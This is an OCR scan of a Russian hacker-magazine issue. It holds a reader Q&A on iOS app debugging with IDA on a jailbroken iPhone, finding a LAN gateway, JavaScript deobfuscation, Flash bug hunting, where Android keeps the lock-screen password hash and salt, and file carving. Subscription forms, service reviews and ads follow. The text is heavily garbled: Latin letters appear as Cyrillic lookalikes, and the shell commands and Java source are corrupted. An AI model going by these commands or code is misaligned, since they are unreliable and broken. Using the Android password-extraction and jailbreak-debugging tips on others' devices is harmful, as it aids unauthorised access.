яблочных программ при помощи связки ЮА + 
беЬидзегѵег (бОВ-зегѵег для І05). 



Нам понадобится 05Х (запущенная на 
виртуальной машине вполне подой- 
дет) с установленным І05 50К для под- 
ключения І05-устройства в режиме разработ- 
чика. Также нужен сам іРЬопе с установленным 
пакетом софта для разработчиков (автома- 
тически ставится через ХСобе) и, конечно же, 
с выполненным джейлбрейком (то есть с гооі- 
доступом) — такой девайс будет основным ин- 
струментом для отладки. Для передачи файлов 
и управления ими полезно также установить 
55Н. В качестве клиента отладчика, как я уже 
сказал, мы будем использовать ЮА. 



Из всех широчайших возможностей 
І05 50К нам потребуется лишь І^аі-еі^ 
(исполняемый файл, содержащий 
в себе секции кода, скомпилированного для 
различных платформ) сервера отладки. Он вхо- 
дит в набор софта для разработки, устанав- 
ливаемый непосредственно на іРЬопе. При 
помощи утилиты Про выделяем из него нужный 
нам исполняемый код для АРМ7: 

Иро -1;Іііп агтѵ7 /ОеѵеІорег/изг/Ьіп/ 
сІеЬи^зегѵег -ои1;ри1; §сІЬ-5гѵ 
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ным софтом и драйверами, поставляемыми 
с устройствами. В большинстве случаев 
драйверы позволяют назначить один ѴІАМ Ю 
для всего трафика, проходящего через сетевой 
интерфейс. Делается это через стандартные 
настройки сетевого адаптера. Несколько 
более широкие возможности предоставляет 
тулза РРОВеІ, предназначенная для управле- 
ния драйверами устройств Іпіеі. С ее помощью 
в пару кликов можно создать несколько вир- 
туальных интерфейсов и назначить им разные 
ѴІАМ Ю. 



□ Что делать, если удалось физически 
подключиться к ІАЫ, но ОНСР нет 
и неясно, что указывать в качестве шлюза? 
Если указать 192.168.0.1, тоже ничего не 
работает. Как быть? 

□ Действительно, далеко не всегда шлюзом 
оказывается первый хост в подсети. 
Особенно если мы имеем дело с чем-то 
покрупнее маленькой домашней сетки. Для 
поиска двери в соседнюю подсеть нам 
понадобятся МАС-адреса всех поднятых хостов 
в нашей подсети, а значит, потенциальных 
шлюзов (для этого достаточно произвести ріпд- 
5сап подсети и заглянуть в составленную 
АРР-таблицу). Начнем слать ТСР 5УМ-запросы 
на заведомо известный ІР из подсети, 
в которую хотим попасть, но в поле МАС-адреса 
получателя будем подставлять значения из 
нашего списка (при поиске шлюза в интернете 
нужно использовать ІР-адрес ресурса, который 
с высокой вероятностью доступен). Таким 
образом, когда наш пакет достигнет потенци- 
ального шлюза, он будетлибо проигнорирован 
(из-за несоответствия ІР-адресов получателя 
и хоста), либо проброшен в соответствующую 
подсеть, откуда нам должен вернуться ответ. 
Это будет означать, что шлюз найден! Конечно, 
проделывать все эти операции вручную нам не 
придется. Этим займется утилита даіеѵѵау- 
Лпсіег ( ЬирзѴ/ЬіСІу/дѵѵПпсІег ). Для ее запуска 
требуется интерпретатор РуіЬоп и библиотека 
Бсару, отвечающая за работу с ТСР. На вход 
подается ІР, до которого будем пробиваться, 
и список МАС'ов. 



БОЛЬШОЙ ВОПРОС 



В ПРОШЛОМ НОМЕРЕ 
ДЛЯ РАЗБОРА СЛОЖНЫХ 
ЭАѴАЗСРІРТ'ОВ 
РЕКОМЕНДОВАЛОСЬ ИСПОЛЬЗОВАТЬ 
ПЛАГИН ДЛЯ БРАУЗЕРА. НО КАК 
БЫТЬ, ЕСЛИ КОД ВДОБАВОК КО 
ВСЕМУ ЕЩЕ И ОБФУСЦИРОВАН? 

Обфусцированный коддействи- 
тельно не редкость. В некоторых 
случаяхзапутывание исполь- 
зуют для сокращения размера скрипта 
или для защиты от простой модифика- 
ции, а иногда для обхода сигнатурных 
фильтровантивирусов, и это куда менее 
приятно. Конечно, многочисленныеавто- 
матические деобфускаторы могут помочь 
разобраться, что же именно и какделает 
этот код, зачастую больше похожий на 





ВгаіпЩск, нежели на Э5. Но поскольку 
народная мудрость гласит: «Если хочешь, 
чтобы что-то былосделанохорошо, — 
сделай это сам», я бы рекомендовал об- 
ратить внимание на ути литу для ручного 
анализа Э5-кода Реѵеіо ( ЬіІ:.Іѵ/РеѵеІо ). 
Несмотря на скромный функционал, она 
позволяет отслеживать и блокировать 
сетевые запросы выполняемого скрипта, 
перехватывать возвращаемые функ- 
циями значения и обращения к 00 М, 
автоматически за менять типичные для 
обфусцированного кода функции на опе- 
раторы вывода в процессе выполнения 
и отображает промежуточный результат. 
Приятным дополнением является пре- 
образователь фор матирован ИЯ, который 
приводиткод в более читабельный вид, 
добавляя отступы и переносы. 




Реѵеіо — отличный инструмент для ручной деобфускации ^аѵа5сгір^ 



Теперь копируем специальный ХМЕ- 
конфиг ( разІеЬіп.соіп/дВЗРсгРг ) в до- 
машний каталог на іРЬопе. Наделяем 
наш исполняемый файл разрешениями на 
необходимые для отладки действия (описаны 
в ХМЕ) и подписываем полученное приложение 
с помощью утилиты ІсІісІ. Последнее необхо- 
димо дополнительно установить через Сусііа 
(это альтернативный АррЗіоге'у репозиторий 
приложений со всякими ништяками): 

ІСІІСІ -Згиіез.хші §сІЬ-5гѵ 




Все почти готово, можно протести- 
ровать сервер отладки. Для примера 
запускаем стандартное приложение 
Параметр -х указывает метод запуска: 
в нашем случае вызов приложения эмулирует- 
ся из зргіпдЬоагсІ. 

~/ ^сІЬ-згѵ -X зргіп^ іі05і::1337 \ 

/АррИсаііопз/МоЬіІеМоІіез . арр/МоЬіІеМоіез 

СОВ должен перейти в режим ожидания 
и оставаться в нем до подключения клиента 
отладчика. 




Моіез. 



Запускаем ІОА и выбираем удаленную 
отладку при помощи СОВ (ОеЬиддег 
-> АиасЬ -> Ретоіе СОВ). Открываем 
диалог настроек исключений (ОеЬид орііопз 
-> Есііі Ехерііопз) и редактируем исключение 
5ІС5Т0Р, деактивируя чекбокс 5іор ргодгат. 
Сохраняем изменения, вводим в соответ- 
ствующие поля ІР и порт и соединяемся 
с сервером отладки, запущенным на іРЬопе. 
Всё, с этого момента, у нас есть возможность 
для отладки І05-приложений, что может быть 
очень полезно исследователям безопасности. 
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Подскажите самые удобные способы 
поиска багов во РІавИ-приложениях. 

Несмотря на то что РІазЬ пророчили 
скорый закат с приходом НТМ15, РІазЬ 
по-прежнему остается самым популярным 
средством для представления мультимедиа на 
просторах Всемирной паутины. Допускаемые 
разработчиками ошибки, как и в любых других 
приложениях, приводят к появлению уязвимо- 
стей, по большей части типовых. Для их 
обнаружения вполне логично использовать 
софт, облегчающий или даже автоматизирую- 
щий этот процесс. Среди множества утилит, 
в той или иной степени предоставляющих нам 
такие возможности, хочется прежде всего 
выделить 5ѴѴР Іпѵезіідаіог ( абоЬе.Іѵ/зѵѵЛпѵ ). 
который не так давно стал доступен для 
широкой публики. Его разработкой занима- 
лись не просто энтузиасты-исследователи, 
а ребята из АсІоЬе ІаЬз! Кому, как не им, 
в подробностях знать особенности этой 
закрытой платформы? Этот потрошитель 
позволяет вытаскивать из 5ѴѴР-файлов 
практически любую информацию, от списков 
экспортируемых классов до дизассемблиро- 
ванного кода, полученного при помощи 
встроенного или подключаемого дизассембле- 
ра. Утилита имеет даже свой легковесный 
веб-сервер для анализа сетевого взаимодей- 
ствия и, конечно же, конфигурируемые 
инструменты для фаззинга входных параме- 
тров, ЛазЬѵагз и сообщений в формате Асііоп 
Меззаде РогтаЕ Дополняют картину встроен- 
ный компилятор АкіопЗсгірІ, НЕХ-редактор 
с распаковщиком и редактор РосаІ ЗЬагесІ 
0Ь]ес1з (РІазЬ соокіе). 

Где и как в ОС Апсігоісі хранится пароль 
разблокировки экрана? 

Как известно, начиная с версии 2.2 
Апсігоісі позволяет использовать 
в качестве пароля разблокировки экрана не 
только комбинации цифр, но и последователь- 
ности символов. На механизме хранения 
и защиты это, впрочем, сказывается не сильно. 
Заглянем в исходники: 

[] раз5ыогсІТоНа5Іі( 

51:гіп^ раззыогсП 

{ 

і-р (раззыо гсі == пиіі) { 

геііигп пиіі; 



_5ігіп§ а1§о = пиіі; 



Ьѵ1:е[] Ііазііесі = пиіі: 

{ 

Ьу1:е[] заІІіесІРаззыогсІ = 

(раззыо гсі + §е1:5а11;()) .§е1:Ву1:е5(); 

Ьѵ1іе[] зііаі = Мезза^еРі^езІ: . 

§е1:Іп5І:апсе(а1ео = "5НА-1"). 

сі і § е 5 1; ( 5 а 11; е сі Р а 5 5 ы о г сі ) ; 

Ьѵ1:е[] тсІ5 = Ме5за§е0і§е5І; . 

^е1;Іп5І;апсе(а1§о = "М05"). 

сІі§е5І;(5а11;есІРа55ыогсІ) ; 
базііесі = (1іоНех(5Ііа1’) + 1іоНех(тсІ5’) ) . 

^еІіВѵІіезП : 



саіісб (Мо5исІіА1§огі1;ІітЕхсер1;іоп е) { 
Іо§.ы(ТАед "Раііесі 1;о епсосіе 
5І;гіп§ Ьесаизе о-Р тіз5Іп§ 

аі^огіііііт: " + аІ^оѴ, 

_} 

геііигп Ііазііесі: 

} 

Как видно, полученный от пользователя 
пароль вместе с солью хешируется с использо- 
ванием двух алгоритмов, после чего два полу- 
ченных значения конкатенируются. Результат 
сохраняется в файле /баіа/зузіет/раззѵѵогсі. 
кеу, откуда его не составит труда вытащить, 
если устройство рутовано. Соль, используемая 
при вычислении хешей, хранится в поле с клю- 
чом Іоскзсгееп.раззѵѵогсІ_заи в базе данных 
50Ыіе, которая, в свою очередь, содержится 
в файле /сіаіа/сіаіа/сот. апсігоісі. ргоѵібегз. 
зеиіпдз/баІаЬазез/зеиіпдз.сІЬ. 

Есть фрагмент большого дампа одного 
из разделов диска, некогда разбитого 
для переноса на флешке. Что посоветуете для 
восстановления файлов из этого кусочка? 

Для выковыривания файлов из дампа, 
будь то образ диска или неким образом 
захваченный и сохраненный поток, идеально 
подходит тулза с медицинским названием 
ЗсаІреІ ( ЬіРІѵЛгзсзсаІреІ ), которую особенно 
любят специалисты по форензике. Анализируя 
сигнатуры заголовков, она с хирургической 
точностью вырезает из груды гигабайтов 
файлы любого популярного формата. Для 
предварительной настройки достаточно 
раскомментировать в конфигурационном 
файле те сигнатуры, которые необходимо 
найти. Если в списке отсутствуют «отпечатки» 
для файлов, которые ты планируешь спасти, 
написание собственной сигнатуры не займет 
много времени. Синтаксис описания предель- 



но прост. В качестве примера рассмотрим 
маску для РОЕ: 

рсі-р у 5000000 %РОР %ЕОР\х0с1 КЕѴЕК5Е 

Здесь рсИ" — расширение для сохранения 
восстановленного файла, далее следуют флаг 
значимости регистра в сигнатуре, макси- 
мальный размер файла, «%Р0Р» — заголовок 
файла и «%ЕОР\хОс1» — завершающие байты. 
Ключевое слово РЕѴЕР5Е дает программе 
понять, что следует искать окончание файла 
в обратном направлении. Это может быть по- 
лезно в случае, если формат файла допускает 
множественные вхождения футера. 

При нажатии С(г1 + С во время работы 
в ЬазЬ для прерывания вывода 
какой-либо команды строка приглашения 
к вводу смещается. В результате получается 
что-то вроде «'^СизегСаИозІпате:-*#». Этот 
недочет не то чтобы очень сильно мешает, но 
можно ли его как-то исправить? 

В процессе работы с ЬазЬ, когда, 
например, выполняется прерывание 
вывода непечатных символов, действительно 
может возникнуть такой «артефакт». И раз уж 
этот небольшой баг ставит под сомнение 
идеальность нашего шелла, посмотрим, что 
можно сделать для его устранения :). Для этого 
будем править переменную окружения, 
содержащую в себе шаблон для вывода строки 
приглашения к вводу (то есть все, что 
находится перед знаком # и мигающим 
курсором). Чтобы начало приглашения 
располагалось в начале строки, нам требуется 
только добавить в начало Е5С-код, переводя- 
щий каретку в нужное место. Это делается 
с помощью следующей команды: 

Р51="\[\033[С\]$Р51" 

Чтобы при последующих запусках команд- 
ной строки не приходилось заново дополнять 
$Р51, можно внести эту команду в .ЬазЬгс 
(обычно находится в домашней директории 
и обрабатывается интерпретатором при каж- 
дом запуске). 

Где найти КРС-протоколы в удобном 
виде? 

Несмотря на то что оформление 
детальных описаний протоколов в виде 
текстовых файлов с псевдографикой, 
очевидно, морально устарело, именно такое 
представление используется по сей день 
и будет использоваться в обозримом будущем. 
Нам, простым любопытствующим, остается 
довольствоваться этой данью исторической 
традиции, хотя это не слишком удобно, или 
использовать один из сервисов, помогающих 
представить РРС в более читабельном виде, 
например Ргеиу-гк ( ЬіЕІу/ргеиугк ). Сверстан- 
ный документ с контекстными ссылками 
на упоминаемые технологии уже не произво- 
диттакого отталкивающего впечатления, как 
сотни килобайт сухого текста. ^ 



ДЛЯ ВЫКОВЫРИВАНИЯ ФАЙЛОВ ИЗ 
ДАМПА, БУДЬ ТО ОБРАЗ ДИСКА ИЛИ 
НЕКИМ ОБРАЗОМ ЗАХВАЧЕННЫЙ 
И СОХРАНЕННЫЙ ПОТОК, ИДЕАЛЬНО 
ПОДХОДИТ ТУЛЗА ЗСАЬРЕЬ 
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Подписка 



ГОДОВАЯ 
ЭКОНОМИЯ 

500 руб 



1. Разборчиво заполни подписной купон и кви- 
танцию, вырезав их из журнала, сделав ксе- 
рокопию или распечатав с сайта зЬор.дІс.ги . 

2. Оплати подписку через любой банк. 

3. Вышли в редакцию копию подписных доку- 
ментов — купона и квитанции — любым из 
нижеперечисленных способов: 

• на е-таіі: биЬзсгіЬейдІс.ги; 

• по факсу: (495) 545-09-06; 

• почтой по адресу: 115280, Москва, 

ул. Ленинская Слобода, 19, Омега плаза, 

5 эт., офис № 21, 

ООО «Гейм Лэнд», отдел подписки. 

ВНИМАНИЕ! ЕСЛИ ПРОИЗВЕСТИ 
ОПЛАТУ В ИЮЛЯ, ТО ПОДПИСКУ МОЖНО 
ОФОРМИТЬ С АВГУСТА. 



12 НОМЕРОВ — 2200 РУБ. 

6 НОМЕРОВ — 1260 РУБ. 

УЗНАЙ, КАК САМОСТОЯТЕЛЬНО ПОЛУЧИТЬ 
ЖУРНАЛ НАМНОГО ДЕШЕВЛЕ! 




ПРИ ПОДПИСКЕ 
НА КОМПЛЕКТ ЖУРНАЛОВ 

ЖЕЛЕЗО + ХАКЕР + 2 ОѴО: — 

ОДИН НОМЕР ВСЕГО ЗА 162 РУБЛЯ 
(НА 35% ДЕШЕВЛЕ, ЧЕМ В РОЗНИЦУ) 



ЗА 12 МЕСЯЦЕВ 3890 РУБЛЕЙ (24 НОМЕРА) 
ЗА 6 МЕСЯЦЕВ 2205 РУБЛЕЙ (12 НОМЕРОВ) 



ЕДИНАЯ ЦЕНА ПО ВСЕЙ РОССИИ. ДОСТАВКА 
ЗА СЧЕТ ИЗДАТЕЛЯ, В ТОМ ЧИСЛЕ КУРЬЕРОМ 
ПО МОСКВЕ В ПРЕДЕЛАХ МКАД 



ЕСТЬ ВОПРОСЫ? Пиши на іпіойдіс.ги или звони по бесплатным телефо- 
нам 8(495)663-82-77 (для москвичей) и 8 (800) 200-3-999 (для жителей 
других регионов России, абонентов сетей МТС, БиЛайн и Мегафон). 



ПОДПИСНОЙ КУПОН 

ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
НА ЖУРНАЛ «ХАКЕР» 

□ на 6 месяцев 

□ на 12 месяцев 

начиная с 201 г. 



I — I Доставлять журнал по почте 
' — ' на домашний адрес 

Доставлять журнал курьером ■ 

□ на адрес ос|эиса* 

I I на домашний адрес** 

(отметь квадрат выбранного варианта подписки) 



Ф.И.О. 



АДРЕС ДОСТАВКИ; 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ^ ) 

е-таіІ 

сумма оплаты 

*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 

свободное поле 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

ОАО «Нордеа Банк», г. Москва 

р/с N° 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


/\дрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


2012 г. 





Кассир 



Ф.И.О. 

Подпись плательщика 



Квитанция 



ИНН 7729410015 



ООО «Гейм Лэнд» 



ОАО «Нордеа Банк», г. Москва 
р/с Мо 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


2012 г. 





Ф.И.О. 



Кассир 



Подпись плательщика 




РАО 



ѴѴѴѴѴѴ2 



Д ^г>ч^1ИіМ1^^ 



Імгіиѣслш№нмгіі#гі4іш ^шй11011-рI:4ЕпмП44вй Ігінннско» 




|1 Л 1»14П «13М |ІМИГ»Ѵ«9 




Навороченный бенчмаркдля замера производительности работы того 
или иного сайта 



ЮАО ІМРАСТ 



ІоасПтрасІ.сопп 

Каждый раз, когда кто-то просит посоветовать утилиту для нагрузочного тестирования 
(чтобы проверить, сможет ли сайт выдержать наплыв большого числа юзеров), прихо- 
дится рекомендовать инструмент вроде аЬ (из состава АрасЬе) или Тзипд. «Но неужели 
неттолкового онлайн-сервиса для техже целей?» — подумал я. Оказалось, есть. 

ІоасІ Ітрасі позволяет эмулировать активность до 50 000 пользователей и в реальном 
времени отслеживать производительность ресурса. При этом можно заранее запи- 
сать разные сценарии поведения и дополнительно запрограммировать их с помощью 
скриптового языка. Конечно, все это стоит денег. Но ІоасІ Ітрасі можно использовать 
бесплатно для быстрого анализа скорости работы произвольного сайта. К примеру, при 
выборе хостинга. 




заіРюоіЕ 



здІЛсІсІІе.сопп 

Если ты ничего не знаешь о 501 и проектировании баз данных, то этот сервис, скорее 
всего, не будет для тебя сильно полезным. Зато для всех тех, кому с БД дело приходит- 
ся иметь хотя бы периодически, 501 РісІсІІе может быть очень кстати. Если кратко, то это 
песочница для 501, где ты можешь строить различные схемы баз данных и тестировать 
на них 501-запросы к базе данных. Ключевая фишка в том, что ты можешь не только 
проверить их правильность, но и оценить время выполнения, а также разобраться с по- 
следовательностью действий внутри базы данных (Ехесиііоп РІап). В списке поддер- 
живаемых баз: разные версии М5 501 5егѵег, Му50Е, Огасіе, Ро5Ідге50Е, 50Ыіе. Для 
любого проекта (так называемого РібсІІе'а) генерируется уникальный линк, который ты 
можешь использовать, запрашивая помощь на форумах или конференциях. 



зпадду 


вине і^см- 

! 




рге5& СГГІ + 



Простой иудобный хостинг для скриншотов 



5МА60У 



5па д . д у 

Классный сервис для публикации скриншотов, который я в последнее время взял на 
вооружение. Раньше, когда мне нужно было наглядно показать ошибку (например, для 
багрепорта разработчикам какого-нибудь приложения), приходилось выполнять целый 
ряд операций. Создать скрин, сохранить его в файл, сделать комментарии в редакторе, 
залить его на хостинг картинок — получается четыре тупых действия. Теперь я просто 
создаю скрин горячей клавишей (например, под виндой для этого достаточно нажать 
на клавиатуре кнопку Ргіпі 5сгееп), вставляю его из буфера обмена на сайте зпадду — 
и сразу получаю линк, куда было загружено изображение. При необходимости можно 
подрезать скрин или сделать подписи с помощью встроенного редактора. 




Модная ѴѴеЬ 2.0 реализация клиента для подключения колдскульным 
ІКС-сетям 



іЕССгоио 



Ьир5://ігссІоисІ.сопп 

Вспоминаю, сколько времени и бессонных ночей было проведено на канале #хакер 
лет десять назад. Протокол ІРС, несмотря на наличие более современных альтернатив, 
уверенно держит позиции одного из лучших решений для организации чата. Огромное 
количество людей с самыми разными увлечениями по-прежнему используют его для 
общения в реальном времени. Зато для подключения к ІРС-сетям и разным каналам, 
помимо старых проверенных десктопных клиентов (вроде тІРС), стали появляться 
вполне пригодные для использования онлайн-сервисы. Один из них — ІРССІоисІ, ко- 
торый позволяет подключаться одновременно к нескольким сетям и не теряет связь, 
если ты закрываешь окно браузера. Разработчики грозятся сделать сервис коммерче- 
ским, но на время бета-тестирования юзать его можно совершенно бесплатно. 
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магазинах твоего 

Участвовать в акциях 1 
и посещать закрытые 

мероприятия для держателей «Мужской Карты» 

-і ^ ' 

Управлять своими счетами, используя сиаему 
интернет-банка «сАльфа-Юіик» ■ 

Оформить подписку на журнал 
«)^кер» со скидной 50% 

тЁл. подпийси (495)-661-82-77 } ^Ьори^1с.пл 



Оформить дебетовую или кредитную «Мужскую карту» можно в отделениях 
ОАО «Альфа-Банка», а также заказав по телефонам; 

(495) 229-2222 в Мсхіквѳ \ 8-800-353-2-335 в регионак России (^омжбвоілшый) 



А Апьфа-Банк (дате)ІапЛ 



ип№лг.тапсагсі.ги 



'^к*. Гтв|]ілымя лмцімшнбпіиРрбаін ні 



:ик операций «-29.00990 №і: 





гуППП 










Теперь везде безопасно 

Услуга «Офис в кармане» — защищенный удаленный 
доступ к корпоративным файлам и почте 

Вы можете оперативно организовать работу сотрудников вне офиса, 
предоставив безопасный доступ к корпоративным файлам и почте. 
Защищенный канал обеспечивает сохранность передаваемой 
информации при доступе из любых мест, в домашней сети и роуминге. 



ѵѵѵѵѵѵ.те^аі'оп.ги 
8 880 550 75 00 




Мегафон 

Связь идей и результатов 








■ т 








л 

ВСЯЧ ш 




Реклама 


.. іа 


В 

■у 








